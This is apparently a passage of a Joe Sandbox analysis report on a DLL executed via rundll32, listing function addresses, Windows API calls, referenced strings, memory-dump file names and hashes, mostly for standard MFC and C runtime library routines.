                                                                                                          Similarity
                                                                                                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                                                                                                          • String ID: LOC
                                                                                                          • API String ID: 1016519223-519433814
                                                                                                          • Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
                                                                                                          • Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 10031D3A
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 10031D7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
                                                                                                          • Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          • GetKeyState.USER32(00000010), ref: 1002797E
                                                                                                          • GetKeyState.USER32(00000011), ref: 10027987
                                                                                                          • GetKeyState.USER32(00000012), ref: 10027990
                                                                                                          • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 100279A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1063413437-0
                                                                                                          • Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
                                                                                                          • Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024F01, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Version_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 963298953-0
                                                                                                          • Opcode ID: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
                                                                                                          • Instruction ID: 60a6db508766d0176de5257cd9c04f851b8e12d18597fbeb5363c1cc45f9d795
                                                                                                          • Opcode Fuzzy Hash: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
                                                                                                          • Instruction Fuzzy Hash: 54F065799002189FEB50DB74DD46B8E77F8AB04304F9144E5950DD3282EA70AA48CB41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028DEC, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                          • String ID: #32768$AfxOldWndProc423$ime
                                                                                                          • API String ID: 867647115-4034971020
                                                                                                          • Opcode ID: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
                                                                                                          • Instruction ID: c9f41a1409c6bb8d0fa3b18bb25e3997143979ac063bd30542687b89172f9a1c
                                                                                                          • Opcode Fuzzy Hash: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
                                                                                                          • Instruction Fuzzy Hash: 2361027590122AAFDB11DF61DD88B9E7BB8FF093A1F920154F509E6191DB30DE80CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                                                                                                          • EnumResourceLanguagesA.KERNEL32 ref: 100215EA
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          • _memset.LIBCMT ref: 10021689
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                          • API String ID: 3537336938-2299501126
                                                                                                          • Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
                                                                                                          • Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10024F5B, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10024FA2
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10024FB3
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10024FC4
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10024FD5
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10024FE6
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10024FF7
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10025008
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                          • API String ID: 667068680-68207542
                                                                                                          • Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                                                                                                          • Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
                                                                                                          • Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                                                                                                          • Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10026EFC, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          • GetParent.USER32(?), ref: 10026F2B
                                                                                                          • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 10026F4E
                                                                                                          • GetWindowRect.USER32 ref: 10026F68
                                                                                                          • GetWindowLongA.USER32 ref: 10026F7E
                                                                                                          • CopyRect.USER32 ref: 10026FCB
                                                                                                          • CopyRect.USER32 ref: 10026FD5
                                                                                                          • GetWindowRect.USER32 ref: 10026FDE
                                                                                                          • CopyRect.USER32 ref: 10026FFA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                          • String ID: (
                                                                                                          • API String ID: 808654186-3887548279
                                                                                                          • Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                                                                                                          • Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
                                                                                                          • Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                                                                                                          • Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                                                                                                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                                                                                                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
                                                                                                          • __lock.LIBCMT ref: 10034688
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                                                                                                          • __lock.LIBCMT ref: 100346A9
                                                                                                          • ___addlocaleref.LIBCMT ref: 100346C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                          • API String ID: 1028249917-2843748187
                                                                                                          • Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
                                                                                                          • Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10020C3F, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                          • API String ID: 667068680-3617302793
                                                                                                          • Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
                                                                                                          • Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043A65, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043A6C
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
                                                                                                          • int.LIBCPMT ref: 10043A8D
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043A96
                                                                                                          • ctype.LIBCPMT ref: 10043AB0
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043AD2
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 2535038987-3145022300
                                                                                                          • Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
                                                                                                          • Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043C84, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043C8B
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
                                                                                                          • int.LIBCPMT ref: 10043CAC
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043CB5
                                                                                                          • codecvt.LIBCPMT ref: 10043CCF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043CF1
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043D01
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043D07
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 577375395-3145022300
                                                                                                          • Opcode ID: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction ID: 1c641b6faa081a6f5f4558330d18bfb7172afe5efef557fc2d9691916cc6be6c
                                                                                                          • Opcode Fuzzy Hash: 92449c159e0a17ff4070164fc4e6f4138defaf5b0dd7c915e336a137390c2ee1
                                                                                                          • Instruction Fuzzy Hash: E701A979D002199BCB06DBA0DC42AAE7375FF84660FB14129F111FB1E1DF74AA008798
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002341C, Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                                                                                                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                                                                                                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                                                                                                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,A72075DA), ref: 1002346F
                                                                                                          • GetDesktopWindow.USER32 ref: 100234A2
                                                                                                          • IsWindowEnabled.USER32(?), ref: 100234B0
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                                                                                                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,A72075DA), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,A72075DA), ref: 100235D9
                                                                                                          Memory Dump Source
